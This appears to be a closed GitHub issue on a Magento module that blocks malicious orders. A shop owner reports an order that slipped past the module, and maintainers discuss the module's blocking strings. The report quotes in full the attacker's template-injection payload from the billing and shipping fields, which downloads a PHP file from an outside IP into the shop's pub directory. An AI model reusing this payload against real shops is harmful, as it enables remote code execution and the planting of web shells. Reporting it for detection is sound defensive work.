Closed briangmoore77 closed 3 days ago
Maybe check if module is enabled.. if you look at module you can see that part of string {{var should be blocked
also check if you have all the strings to find from commit https://github.com/DeployEcommerce/module-trojan-order-prevent/commit/fb857ffb76b30cb25e08f16da29fed0864a27707
".php" and "this.getTemp" should have blocked it too
we updated the module and it is now blocking the code snippet i reported.
We are getting orders now with our pay by check option that are not getting blocked by your module. this is what is in the billing and shipping info: {{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}hxxp://185.157.161.207/cache.php?m=48993-20328-20087)}}
they are also using this email address johnsmith9172@outlook.com
Expected Behavior
The order would be blocked by throwing and exception error
Current Behavior
the order gets submitted
Steps to Reproduce
create and order using the above shipping and billing information the order will complete.
thank you for creating this module.